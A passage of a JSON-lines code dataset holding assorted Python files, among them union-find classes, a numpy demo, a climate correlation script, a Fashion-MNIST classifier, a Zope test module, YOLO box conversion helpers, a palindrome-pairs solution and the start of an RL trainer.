INT;\n ))\n self.connection.commit()\n\n def newSubscriber(self, from_user_id, to_user_id):\n self.cursor.execute(\"INSERT INTO users VALUES({0}, {1})\".format(from_user_id, to_user_id))\n self.connection.commit()\n\n def getSubscribes(self, from_user_id):\n self.cursor.execute(\"SELECT subscribed_to_user_id FROM users WHERE user_id = {0}\".format(from_user_id))\n data = self.cursor.fetchall()\n print(data)\n #return data\n\n\"\"\"","sub_path":"Testing.py","file_name":"Testing.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"226727566","text":"class Connectivity:\n def __init__(self):\n self.data = None\n self.length = None\n\n def union(self, element, to_element):\n raise NotImplementedError\n\n def is_connected(self, element, to_element):\n raise NotImplementedError\n\n @staticmethod\n def drop(obj):\n obj.data = [i for i in range(obj.length)]\n print('=== Dropped ===')\n\n def show_connection(self, element, to_element):\n print(f'id {element} connected to id {to_element}: ', self.is_connected(element, to_element))\n\n def __repr__(self):\n a = [i for i in range(self.length)]\n b = self.data\n return f'{a} \"ids\"\\n{b}\\n'\n\n def __str__(self):\n return self.__repr__()\n\n\nclass QuickFind(Connectivity):\n def __init__(self, length):\n super().__init__()\n self.length = length\n self.data = [i for i in range(length)]\n\n def union(self, element, to_element):\n if self.is_connected(element, to_element):\n return\n\n element_value = self.data[element]\n to_element_value = self.data[to_element]\n\n for i in range(self.length):\n if self.data[i] == element_value:\n self.data[i] = to_element_value\n\n def is_connected(self, element, to_element):\n return self.data[element] == self.data[to_element]\n\n\nclass QuickUnion(Connectivity):\n def __init__(self, length):\n super().__init__()\n self.length = length\n self.data = [i for i in range(length)]\n\n def _get_root(self, i):\n\n while i != self.data[i]:\n i = self.data[i]\n\n return i\n\n def union(self, element, to_element):\n element_root = self._get_root(element)\n to_element_root = self._get_root(to_element)\n self.data[element_root] = to_element_root\n\n def is_connected(self, element, to_element):\n return self._get_root(element) == self._get_root(to_element)\n\n\nclass QuickUnionWeighted(QuickUnion):\n def __init__(self, length):\n super().__init__(length)\n self.size_array = [1 for _ in range(length)]\n\n def union(self, element, to_element):\n element_root = self._get_root(element)\n to_element_root = self._get_root(to_element)\n\n if element_root == to_element_root:\n return\n\n if self.size_array[element_root] < self.size_array[to_element_root]:\n self.data[element_root] = to_element_root\n self.size_array[to_element_root] += self.size_array[element_root]\n else:\n self.data[to_element_root] = element_root\n self.size_array[element_root] += self.size_array[to_element_root]\n\n\nif __name__ == \"__main__\":\n def connectivity_scenario(find_object):\n print('--- ' * 20)\n print(f'Scenario for {find_object.__class__.__name__}')\n print('--- ' * 20)\n find_object.show_connection(0, 3)\n\n find_object.union(0, 3)\n find_object.show_connection(0, 3)\n\n find_object.drop(find_object)\n find_object.show_connection(0, 3)\n\n find_object.union(0, 3)\n print(find_object)\n find_object.union(0, 4)\n print(find_object)\n find_object.union(3, 5)\n print(find_object)\n find_object.union(9, 1)\n print(find_object)\n find_object.show_connection(5, 4)\n print('--- ' * 20)\n\n connectivity_scenario(find_object=QuickFind(length=10))\n connectivity_scenario(find_object=QuickUnion(length=10))\n connectivity_scenario(find_object=QuickUnionWeighted(length=10))\n","sub_path":"education_part/connectivity/connectivity.py","file_name":"connectivity.py","file_ext":"py","file_size_in_byte":3527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"532298583","text":"import numpy as np\na = np.array([[1, 2], [3, 4]]) \nb = np.array([[5, 6]])\nprint(np.concatenate((a, b), axis=0)) # 这里的axis=0的表示按照行进行合并\n'''\narray([[1, 2],\n [3, 4],\n [5, 6]])\n'''\nc = np.array([[1, 2], [3, 4]]) \nd = np.array([[5, 6]])\nprint(np.concatenate((c, d.T), axis=1)) # 这里的axis=1的表示按照列进行合并\n'''\narray([[1, 2, 5],\n [3, 4, 6]])\n'''\n","sub_path":"lib/basics/concatenate用法.py","file_name":"concatenate用法.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"96421604","text":"#correlations of extratropical asymmetries and computation of asymmetric index\nimport numpy as np\nimport xarray as xr\nimport os\n\ndef TestCorrelation(var1, var2, var3, var4):\n\tvarx = np.mean(var1, axis=0) - np.mean(var2, axis=0)\n\tvary = np.mean(var3, axis=0) - np.mean(var4, axis=0)\n\tvarx = np.ravel(varx)\n\tvary = np.ravel(vary)\n\tcorrelacion = np.corrcoef(varx, vary)[0, 1]\n\treturn correlacion\ndef ComputeAsymmetry(field, pattern):\n\t\"\"\"project pattern inot fiels\"\"\"\n\tpattern = np.ravel(pattern)\n\tpattern = pattern #/ np.sqrt(np.sum(pattern * pattern))\n\tpattern = np.tile(pattern[np.newaxis, :], (field.shape[0], 1))\n\tfield = np.reshape(field,[field.shape[0], field.shape[1]*field.shape[2]])\n\tfield_norm = np.reshape(np.tile((np.sum(field * field, axis=1)), (1, field.shape[1])),\n\t\t\t\t[field.shape[0], field.shape[1]])\n\tprint(field_norm.shape)\n#\tfield_norm = \n\tindex = np.squeeze(np.sum(field /field_norm * pattern, axis=1))\n\treturn index\n#================================================\nos.environ['HDF5_USE_FILE_LOCKING'] = 'FALSE'\nPATH_DATA = '~/datos/data/'\nPATH_DATA_2 = '/home/users/vg140344/datos/data/fogt/'\nFIG_PATH = '/home/users/vg140344/assessment_SH_zonal_asymmetries/figures/strat_trop_zonal_asymmetries/decile_new/'\nFILE_HGT_S4 = 'monthly_hgt200_aug_feb.nc4'\nFILE_NINIO_S4 = 'fogt/ninio34_monthly.nc4'\nFILE_PV_S4 = 'fogt/SPV_index.nc4'\nhgt = xr.open_dataset(PATH_DATA + FILE_HGT_S4)\nhgt = hgt - hgt.mean(dim='longitude')\nhgt = hgt.sel(**{'latitude':slice(-45, -90)})\nninio34 = xr.open_dataset(PATH_DATA + FILE_NINIO_S4)\nPV_index = xr.open_dataset(PATH_DATA + FILE_PV_S4)\n\n#search for years with weak PV\nindex_SPV_upper = PV_index.SPV_index >= PV_index.SPV_index.quantile(0.90, dim='dim_0', interpolation='linear')\n#search for years with strong PV\nindex_SPV_lower = PV_index.SPV_index <= PV_index.SPV_index.quantile(0.10, dim='dim_0', interpolation='linear')\n\n#enso during all years\nindex_ninio_all = ninio34.ninio34_index >= ninio34.ninio34_index.quantile(0.90, dim='dim_0', interpolation='linear')\nindex_ninia_all = ninio34.ninio34_index <= ninio34.ninio34_index.quantile(0.10, dim='dim_0', interpolation='linear')\nindex_normal_all = np.logical_and(ninio34.ninio34_index < ninio34.ninio34_index.quantile(0.90, dim='dim_0', interpolation='linear'), ninio34.ninio34_index > ninio34.ninio34_index.quantile(0.10, dim='dim_0', interpolation='linear'))\n#enso during weak PoV\n\nindex_ninio_WPV = np.logical_and(index_ninio_all.values, index_SPV_upper.values)\nindex_ninia_WPV = np.logical_and(index_ninia_all.values, index_SPV_upper.values)\nindex_normal_WPV = np.logical_and(index_normal_all.values, index_SPV_upper.values)\n\n#enso during strong PoV\nindex_ninio_SPV = np.logical_and(index_ninio_all.values, index_SPV_lower.values)\nindex_ninia_SPV = np.logical_and(index_ninia_all.values, index_SPV_lower.values)\nindex_normal_SPV = np.logical_and(index_normal_all.values, index_SPV_lower.values)\n\ncorrel_ninio_WPV = np.empty([7])\ncorrel_ninia_WPV = np.empty([7])\ncorrel_ninio_SPV = np.empty([7])\ncorrel_ninia_SPV = np.empty([7])\ncorrel_ninia = np.empty([7])\ncorrel_ninio = np.empty([7])\n\nmonth = ['Aug', 'Sep', 'Oct', 'Nov', 'Dec', 'Jan', 'Feb']\nseas = ['ASO', 'SON', 'OND', 'NDJ', 'DJF']\n\nfor i in np.arange(0, 7):\n\tvar_ninio_WPV = hgt.z.values[i, index_ninio_WPV, :, :]\n\tvar_normal_WPV = hgt.z.values[i, index_normal_WPV, :, :]\n\tvar_ninia_WPV = hgt.z.values[i, index_ninia_WPV, :, :]\t\n\tvar_ninio_SPV = hgt.z.values[i, index_ninio_SPV, :, :]\n\tvar_normal_SPV = hgt.z.values[i, index_normal_SPV, :, :]\n\tvar_ninia_SPV = hgt.z.values[i, index_ninia_SPV, :, :]\t\n\tvar_ninio_all = hgt.z.values[i, index_ninio_all.values, :, :]\n\tvar_normal_all = hgt.z.values[i, index_normal_all.values, :, :]\n\tvar_ninia_all = hgt.z.values[i, index_ninia_all.values, :, :]\n\tnp.savez(PATH_DATA_2 + 'z200_conditioned_' + month[i] + '_d_new.npz', var1=hgt.z.values[i, index_ninio_all.values, :, :], var2=hgt.z.values[i, index_normal_all.values, :, :], var3=hgt.z.values[i, index_ninia_all.values, :, :], var4=hgt.z.values[i, index_ninio_WPV, :, :], var5=hgt.z.values[i, index_normal_WPV, :, :], var6=hgt.z.values[i, index_ninia_WPV, :, :], var7=hgt.z.values[i, index_ninio_SPV, :, :], var8=hgt.z.values[i, index_normal_SPV, :, :], var9=hgt.z.values[i, index_ninia_SPV, :, :])\n\n#testear si los campos son distintos:\n\t#test correlation\n\tcorrel_ninio_WPV[i] = TestCorrelation(var_ninio_all, var_normal_all, var_ninio_WPV, var_normal_WPV)\n\tcorrel_ninia_WPV[i] = TestCorrelation(var_ninia_all, var_normal_all, var_ninia_WPV, var_normal_WPV)\n\tcorrel_ninia[i] = TestCorrelation(var_ninia_SPV, var_normal_SPV, var_ninia_WPV, var_normal_WPV)\n\tcorrel_ninio[i] = TestCorrelation(var_ninio_SPV, var_normal_SPV, var_ninio_WPV, var_normal_WPV)\n\tcorrel_ninio_SPV[i] = TestCorrelation(var_ninio_all, var_normal_all, var_ninio_SPV, var_normal_SPV)\n\tcorrel_ninia_SPV[i] = TestCorrelation(var_ninia_all, var_normal_all, var_ninia_SPV, var_normal_SPV)\n\nds = xr.Dataset({'correl_ninio_WPV': (['month'], correl_ninio_WPV),\n\t\t 'correl_ninia_WPV': (['month'], correl_ninia_WPV),\n\t\t 'correl_ninio_SPV': (['month'], correl_ninio_SPV),\n\t\t 'correl_ninia_SPV': (['month'], correl_ninia_SPV),\n\t\t 'correl_ninia': (['month'], correl_ninia),\n\t\t 'correl_ninio': (['month'], correl_ninio)},\n\t\t coords={'month': (['month'], month)})\nds.to_netcdf(PATH_DATA_2 + 'monthly_correlations_enso_SPoV_polar_d_new.nc4')\n\ncorrel_ninio_WPV = np.empty([5])\ncorrel_ninia_WPV = np.empty([5])\ncorrel_ninio_SPV = np.empty([5])\ncorrel_ninia_SPV = np.empty([5])\ncorrel_ninio = np.empty([5])\ncorrel_ninia = np.empty([5])\n\nfor i in np.arange(0, 5):\n\thgt_s = hgt.isel(month=range(i, i+3)).mean(dim='month')\n\tvar_ninio_WPV = hgt_s.z.values[index_ninio_WPV, :, :]\n\tvar_normal_WPV = hgt_s.z.values[index_normal_WPV, :, :]\n\tvar_ninia_WPV = hgt_s.z.values[index_ninia_WPV, :, :]\t\n\tvar_ninio_SPV = hgt_s.z.values[index_ninio_SPV, :, :]\n\tvar_normal_SPV = hgt_s.z.values[index_normal_SPV, :, :]\n\tvar_ninia_SPV = hgt_s.z.values[index_ninia_SPV, :, :]\t\n\tvar_ninio_all = hgt_s.z.values[index_ninio_all.values, :, :]\n\tvar_normal_all = hgt_s.z.values[index_normal_all.values, :, :]\n\tvar_ninia_all = hgt_s.z.values[index_ninia_all.values, :, :]\n\n\t#save npz file to compute correlations\n\tnp.savez(PATH_DATA_2 + 'z200_conditioned_' + seas[i] + '_d_new.npz', var1=hgt_s.z.values[index_ninio_all.values, :, :], var2=hgt_s.z.values[index_normal_all.values, :, :], var3=hgt_s.z.values[index_ninia_all.values, :, :], var4=hgt_s.z.values[index_ninio_WPV, :, :], var5=hgt_s.z.values[index_normal_WPV, :, :], var6=hgt_s.z.values[index_ninia_WPV, :, :], var7=hgt_s.z.values[index_ninio_SPV, :, :], var8=hgt_s.z.values[index_normal_SPV, :, :], var9=hgt_s.z.values[index_ninia_SPV, :, :])\n\t#test correlation\n\tcorrel_ninio_WPV[i] = TestCorrelation(var_ninio_all, var_normal_all, var_ninio_WPV, var_normal_WPV)\n\tcorrel_ninia_WPV[i] = TestCorrelation(var_ninia_all, var_normal_all, var_ninia_WPV, var_normal_WPV)\n\tcorrel_ninio_SPV[i] = TestCorrelation(var_ninio_all, var_normal_all, var_ninio_SPV, var_normal_SPV)\n\tcorrel_ninia_SPV[i] = TestCorrelation(var_ninia_all, var_normal_all, var_ninia_SPV, var_normal_SPV)\n\tcorrel_ninia[i] = TestCorrelation(var_ninia_SPV, var_normal_SPV, var_ninia_WPV, var_normal_WPV)\n\tcorrel_ninio[i] = TestCorrelation(var_ninio_SPV, var_normal_SPV, var_ninio_WPV, var_normal_WPV)\n\n\n\nds = xr.Dataset({'correl_ninio_WPV': (['seas'], correl_ninio_WPV),\n\t\t 'correl_ninia_WPV': (['seas'], correl_ninia_WPV),\n\t\t 'correl_ninio_SPV': (['seas'], correl_ninio_SPV),\n\t\t 'correl_ninia_SPV': (['seas'], correl_ninia_SPV),\n\t\t 'correl_ninia': (['seas'], correl_ninia),\n\t\t 'correl_ninio': (['seas'], correl_ninio)},\n\t\t coords={'seas': (['seas'], seas)})\nds.to_netcdf(PATH_DATA_2 + 'seasonal_correlations_enso_SPoV_polar_d_new.nc4')\n\n\n\n","sub_path":"strat_trop_zonal_asymmetries/decile/asymmetric_index_z200_new.py","file_name":"asymmetric_index_z200_new.py","file_ext":"py","file_size_in_byte":7738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"561830877","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport tensorflow as tf\r\nfrom tensorflow.keras.datasets import fashion_mnist\r\nimport pandas as pd\r\n#load the data sheet\r\n(xtrain,ytrain),(xtest,ytest)=fashion_mnist.load_data()\r\nfashion_labels=[\"T-shirt/top\",\"Trousers\",\"Pullover\",\"Dress\",\"Coat\",\"Sandal\",\"Shirt\",\"Sneaker\",\"Bag\",\"Ankle boot\"]\r\nbatch_size=128\r\nepochs=3\r\nn_classes=10\r\nwidth=28\r\nheight=28\r\n#normalize the feature for better training\r\nxtrain=xtrain.astype('float32')/255.0\r\nxtest=xtest.astype('float32')/255.0\r\n#flatten the features for use the training algorithm\r\nxtrain=xtrain.reshape((60000,width*height))\r\nxtest=xtest.reshape((10000,width*height))\r\n#print(xtrain,xtest)\r\nsplit=50000\r\n#split feature training set into training and vakidation sets\r\n(xtrain,xvalid)=xtrain[:split],xtrain[split:]\r\n(ytrain,yvalid)=ytrain[:split],ytrain[split:]\r\nytrain_ohe=tf.one_hot(ytrain,depth=n_classes).numpy()\r\nyvalid_ohe=tf.one_hot(yvalid,depth=n_classes).numpy()\r\nytest_ohe=tf.one_hot(ytest,depth=n_classes).numpy()\r\n#plot images\r\n_,image=plt.subplots(1,10,figsize=(8,1))\r\nfor i in range(10):\r\n image[i].imshow(np.reshape(xtrain[i],(width,height)),cmap=\"Greys\")\r\n print(fashion_labels[ytrain[i]],sep=\",end=\")\r\nplt.show()\r\n#bulid the model \r\nmodel=tf.keras.models.Sequential(\\\r\n[tf.keras.layers.Dense(n_classes,activation='softmax')] )\r\nmodel.compile(optimizer='adam',loss='categorical_crossentropy',metrics=['accuracy'])\r\n#loss function=cross entropy (not sure )\r\n#metrics accracy is normal standard for error rate\r\nmodel.fit(xtrain,ytrain_ohe,batch_size=batch_size,epochs=epochs,validation_data=(xvalid,yvalid_ohe))\r\nmodel.summary()\r\n\r\n\r\n# evaluate the model on the test set\r\nscores = model.evaluate(xtest, ytest_ohe, batch_size)\r\nprint(\"Final test loss and accuracy :\", scores)\r\ny_predictions = model.predict(xtest)\r\n# example of one predicted versus one true fashion label\r\nindex = 42\r\nindex_predicted = np.argmax(y_predictions[index]) #model預測的丟進去\r\n# largest label probability\r\nindex_true = np.argmax(ytest_ohe[index])\r\n# pick out index of element with a 1 in it\r\nprint(\"When prediction is \" , index_predicted)\r\nprint(\"ie. predicted label is\",\r\nfashion_labels[index_predicted])\r\nprint(\"True label is \", fashion_labels[index_true])\r\nprint (\"\\n\\nPredicted V (True) fashion labels,\\\r\ngreen is correct, red is wrong\")\r\nsize = 12 # 12 random numbers out of x_test.shape[0]\r\nfig = plt.figure(figsize=(15,3))\r\nrows = 3\r\ncols = 4\r\nfor i, index in enumerate(np.random.choice(\\\r\n xtest.shape[0], size = size, replace = False)):\r\n axis=fig.add_subplot(rows,cols,i+1)\r\n # position i+1 in grid with rows rows and cols columns\r\n axis.imshow(xtest[index].reshape(width,height),cmap=\"Greys\")\r\n index_predicted = np.argmax(y_predictions[index])\r\n index_true = np.argmax(ytest_ohe[index])\r\n axis.set_title((\"{} ({})\").format(\\\r\n fashion_labels[index_predicted],fashion_labels[index_true]),\r\n color=(\"green\" if index_predicted == index_true else \"red\"))\r\nplt.show()","sub_path":"10multiclass_logistic-regression.py","file_name":"10multiclass_logistic-regression.py","file_ext":"py","file_size_in_byte":3002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"278294923","text":"# Copyright 2015 MediaTek Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport os\nimport time\nimport subprocess\nimport sys\nimport xmlrpclib\nfrom subprocess import Popen, PIPE\nfrom threading import Thread\n\nfrom wlauto import Instrument, Executable, Parameter\nfrom wlauto.exceptions import ConfigError\nfrom wlauto.utils.misc import ensure_file_directory_exists as _f\nfrom wlauto.utils.types import arguments, list_of_strs\n\nfrom Queue import Queue, Empty\n\nclass ServoInstrument(Instrument):\n \"\"\" \n Measure power consumption with chromium servo board\n \"\"\"\n\n name = 'servo'\n description = 'chromium servo board'\n\n parameters = [\n Parameter('servod_host', kind=str, default='localhost',\n global_alias='servo_servod_host',\n description=\"\"\"hostname of the servod running\"\"\"),\n Parameter('servod_port', kind=str, default='9999',\n global_alias='servo_servod_port',\n description=\"\"\"port number of the servod running\"\"\"),\n Parameter('delay', kind=float, default=0.2,\n global_alias='servo_delay',\n description=\"\"\"delay before getting values\"\"\"),\n Parameter('power_for_little', kind=list_of_strs,\n default=['dvfs2_mw', 'sram15_mw'],\n global_alias='servo_power_for_little',\n description=\"\"\"names of power meters for little cluster\"\"\"),\n Parameter('power_for_big', kind=list_of_strs,\n default=['dvfs1_mw', 'sram7_mw'],\n global_alias='servo_power_for_big',\n description=\"\"\"names of power meters for big cluster\"\"\"),\n ]\n\n def initialize(self, context):\n self.start_time = None\n self.end_time = None\n self.proxy = xmlrpclib.ServerProxy(\"http://\" +\n\t\tself.servod_host + \":\" + self.servod_port + \"/\")\n\n def setup(self, context):\n pass\n\n def enqueue_output(self, queue):\n little_p = big_p = 0\n time.sleep(self.delay)\n\n for l in self.power_for_little:\n little_p += float(self.proxy.get(l))\n\n for b in self.power_for_big:\n big_p += float(self.proxy.get(b))\n\n queue.put(little_p)\n queue.put(big_p)\n\n def get_power(self):\n q = Queue()\n t = Thread(target=self.enqueue_output, args=[q])\n t.daemon = True # thread dies with the program\n t.start()\n return q\n\n def fast_start(self, context):\n self.start_time = time.time()\n self.q = self.get_power()\n self.start_a53_power = 0\n self.start_a72_power = 0\n\n def fast_stop(self, context):\n self.end_time = time.time()\n self.start_a53_power = self.q.get_nowait()\n self.start_a72_power = self.q.get_nowait()\n\n def update_result(self, context):\n power_consumed = self.end_time - self.start_time\n context.result.add_metric('a53_power', self.start_a53_power, 'milliwatts')\n context.result.add_metric('a72_power', self.start_a72_power, 'milliwatts')\n\n def teardown(self, context):\n pass\n\n def finalize(self, context):\n pass\n","sub_path":"wlauto/instrumentation/servo_board/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"74211680","text":"##############################################################################\n#\n# Copyright (c) 2001, 2002 Zope Foundation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"Onlinehelp tree view Tests\n\n$Id$\n\"\"\"\nimport os\n\nfrom unittest import TestCase, TestLoader, TextTestRunner\n\nfrom zope import component\nfrom zope.pagetemplate.tests.util import check_xml\nfrom zope.publisher.browser import TestRequest\nfrom zope.app.component.testing import PlacefulSetup\nfrom zope.app.onlinehelp.tests import util\nfrom zope.app.onlinehelp.interfaces import IOnlineHelp, IOnlineHelpTopic\nfrom zope.app.onlinehelp.onlinehelp import OnlineHelp\nfrom zope.app.onlinehelp.onlinehelptopic import OnlineHelpTopic\nfrom zope.app.onlinehelp.browser.tree import OnlineHelpTopicTreeView\n\n\ndef testdir():\n import zope.app.onlinehelp.tests\n return os.path.dirname(zope.app.onlinehelp.tests.__file__)\n\n\nclass TestOnlineHelpTopicTreeView(PlacefulSetup, TestCase):\n \n def setUp(self):\n PlacefulSetup.setUp(self, site=True)\n path = os.path.join(testdir(), 'help.txt')\n self.onlinehelp = OnlineHelp('Help', path)\n component.provideUtility(self.onlinehelp, IOnlineHelp, \"OnlineHelp\")\n\n def test_onlinehelp(self):\n view = OnlineHelpTopicTreeView\n treeView = view(self.rootFolder, TestRequest()).getTopicTree\n check_xml(treeView(), util.read_output('test1.xml'))\n\n def test_topics(self):\n path = os.path.join(testdir(), 'help.txt')\n \n id = 'topic1'\n title = 'Topic1'\n parentPath = \"\"\n topic1 = OnlineHelpTopic(id, title, path, parentPath)\n self.onlinehelp['topic1'] = topic1\n\n id = 'topic1_1'\n title = 'Topic1_1'\n parentPath = 'topic1'\n topic1_1 = OnlineHelpTopic(id, title, path, parentPath)\n topic1['topic1_1'] = topic1_1\n\n id = 'topic1_1_1'\n title = 'Topic1_1_1'\n parentPath = 'topic1/topic1_1'\n topic1_1_1 = OnlineHelpTopic(id, title, path, parentPath)\n topic1_1['topic1_1_1'] = topic1_1_1\n\n id = 'topic2'\n title = 'Topic2'\n parentPath = \"\"\n topic2 = OnlineHelpTopic(id, title, path, parentPath)\n self.onlinehelp['topic2'] = topic2\n \n view = OnlineHelpTopicTreeView\n treeView = view(self.rootFolder, TestRequest()).getTopicTree\n check_xml(treeView(), util.read_output('test2.xml'))\n\n\ndef test_suite():\n loader = TestLoader()\n return loader.loadTestsFromTestCase(TestOnlineHelpTopicTreeView)\n\nif __name__=='__main__':\n TextTestRunner().run(test_suite())\n","sub_path":"zope.app.onlinehelp/branches/3.5/src/zope/app/onlinehelp/tests/test_treeview.py","file_name":"test_treeview.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"344746736","text":"# 입력 : 이동하려는 채널 N, 고장난 버튼 수: M , 고장난 버튼들\n# 출력 : 채널 N으로 이동 가능할때 까지 누르는 최소 버튼 수\n# 시작 채널은 100이고, 최소 차이를 구하면 될거같은데... 그 경우의 수가..?\n\nimport sys\n\nsys.stdin = open('input.txt', 'r')\n\nN = int(input())\nM = int(input())\n\ntotal_buttons = set(str(i) for i in range(0, 10))\nbroken_buttons = set(input().split())\n","sub_path":"PYTHON/BAEKJOON/1107_리모컨/X_1107.py","file_name":"X_1107.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"40398496","text":"import re\nimport os\n\n\ndef get_files_in_dir(basepath,ext=[],debug=False):\n\n basepath=os.path.abspath(basepath)\n\n ext = [str.lower(x) for x in ext]\n\n try:\n if os.path.exists(basepath) and os.path.isdir(basepath):\n result=[os.path.join(basepath,x) for x in os.listdir(basepath)]\n files=[x for x in result if os.path.isfile(x)]\n if len(ext)==0:\n print('无类型筛选,返回所有文件')\n if debug:print(files)\n return files\n\n if len(ext)>0 :\n print('返回{}类型的文件'.format(ext))\n files=[x for x in files if str.lower(re.split(r'\\.',x)[-1]) in ext]\n if debug:print(files)\n return files\n else:\n return False\n except Exception as e:\n print('发生错误{}'.format(e))\n\n\n\n\ndef convert_xy_to_yolo(x_min,y_min,x_max,y_max,w_image,h_image):\n x_yolo = ((x_min + x_max) / 2 - 1) / w_image\n y_yolo = ((y_min + y_max) / 2 - 1) / h_image\n w_yolo = (x_max - x_min) / w_image\n h_yolo = (y_max - y_min) / h_image\n return x_yolo,y_yolo,w_yolo,h_yolo\n\ndef convert_yolo_to_xy(x_yolo,y_yolo,w_yolo,h_yolo,image_w,image_h):\n\n xmin = float(x_yolo) - float(w_yolo) / 2\n xmax = float(x_yolo) + float(w_yolo) / 2\n\n ymin = float(y_yolo) - float(h_yolo) / 2\n ymax = float(y_yolo) + float(h_yolo) / 2\n\n # 将坐标(0-1之间的值)还原回在图片中实际的坐标位置\n xmin, xmax = int(image_w * xmin), int(image_w * xmax)\n ymin, ymax = int(image_h * ymin), int(image_h * ymax)\n\ndef get_yolo_data_from_file(file_path):\n '''\n 生成器,用for读取\n @param file_path:\n @return:\n '''\n with open(file_path,'r',encoding='utf-8') as f:\n while 1:\n s=f.readline()\n if s=='':\n break\n else:\n tag, x_yolo, y_yolo, w_yolo, h_yolo = [float(x) for x in s.split(' ')]\n yield int(tag),float(x_yolo),float(h_yolo),float(w_yolo),float(h_yolo)\n\nfor i in get_yolo_data_from_file('E:\\yoloxml/mars_0.txt'):\n print(*i)","sub_path":"my_model/yolo-xml转换.py","file_name":"yolo-xml转换.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"142318480","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2017/6/23 PM12:11\n# @Author : Qiming Zhang\n# @File : PalindromePairs\n# 利用字典wmap保存单词 -> 下标的键值对\n\n# 遍历单词列表words,记当前单词为word,下标为idx:\n\n# 1). 若当前单词word本身为回文,且words中存在空串,则将空串下标bidx与idx加入答案\n\n# 2). 若当前单词的逆序串在words中,则将逆序串下标ridx与idx加入答案\n\n# 3). 将当前单词word拆分为左右两半left,right。\n\n# 3.1) 若left为回文,并且right的逆序串在words中,则将right的逆序串下标rridx与idx加入答案\n \n# 3.2) 若right为回文,并且left的逆序串在words中,则将left的逆序串下标idx与rlidx加入答案\nclass Solution(object):\n def palindromePairs(self, words):\n \"\"\"\n :type words: List[str]\n :rtype: List[List[int]]\n \"\"\"\n def isPalindrome(s):\n return s == s[::-1]\n dic = {y: x for x, y in enumerate(words)}\n res = []\n l = len(words)\n for i in range(l):\n word = words[i]\n if word != \"\" and isPalindrome(word):\n if \"\" in dic:\n res.append([dic[\"\"], i])\n res.append([i, dic[\"\"]])\n rev = word[::-1]\n if rev in dic and i != dic[rev]:\n res.append([i, dic[rev]])\n for x in range(1, len(word)):\n left, right = word[:x], word[x:]\n leftr, rightr = left[::-1], right[::-1]\n if isPalindrome(left) and rightr in dic:\n res.append([dic[rightr], i])\n if isPalindrome(right) and leftr in dic:\n res.append([i, dic[leftr]])\n return res\n\n","sub_path":"String/PalindromePairs.py","file_name":"PalindromePairs.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"641617859","text":"from collections import OrderedDict\nimport pickle\nimport os\nimport sys\nimport time\n\nimport gym\nfrom gym import wrappers\nimport numpy as np\nimport torch\nfrom tqdm import tqdm\n\nimport core.pytorch_util as ptu\nimport core.utils\nfrom core.logger import Logger\n\nfrom dqn_agent import DQNAgent\nfrom core.dqn_utils import (\n get_wrapper_by_name,\n register_custom_envs\n)\n\n\n# how many rollouts to save as videos to tensorboard\nMAX_NVIDEO = 2\nMAX_VIDEO_LEN = 40 # we overwrite this in the code below\n\n\nclass RL_Trainer(object):\n\n def __init__(self, params):\n\n #############\n ## INIT\n #############\n\n # Get params, create logger\n self.params = params\n # Set random seeds\n seed = self.params['seed']\n np.random.seed(seed)\n torch.manual_seed(seed)\n ptu.init_gpu(\n use_gpu=not self.params['no_gpu'],\n gpu_id=self.params['which_gpu']\n )\n\n #############\n ## ENV\n #############\n\n # Make the gym environment\n register_custom_envs()\n self.env = gym.make(self.params['env_name'])\n if ('Pointmass' in self.params['env_name']):\n import matplotlib\n matplotlib.use('Agg')\n self.env.set_logdir(self.params['logdir'] + '/expl_')\n #self.eval_env.set_logdir(self.params['logdir'] + '/eval_')\n\n if 'env_wrappers' in self.params:\n self.env = wrappers.Monitor(self.env, os.path.join(self.params['logdir']), force=True)\n self.mean_episode_reward = -float('nan')\n self.best_mean_episode_reward = -float('inf')\n \n self.env.seed(seed)\n \n # Observation and action sizes\n ob_dim = self.env.observation_space.shape[0] # #if img else self.env.observation_space.shape[0]\n ac_dim = self.env.action_space.n\n print(\"ob_dim = {}, ac_dim = {}\".format(self.env.observation_space, ac_dim))\n self.params['agent_params']['ac_dim'] = ac_dim\n self.params['agent_params']['ob_dim'] = ob_dim\n \n #############\n ## AGENT\n #############\n\n agent_class = self.params['agent_class']\n self.agent = agent_class(self.env, self.params['agent_params'])\n\n def 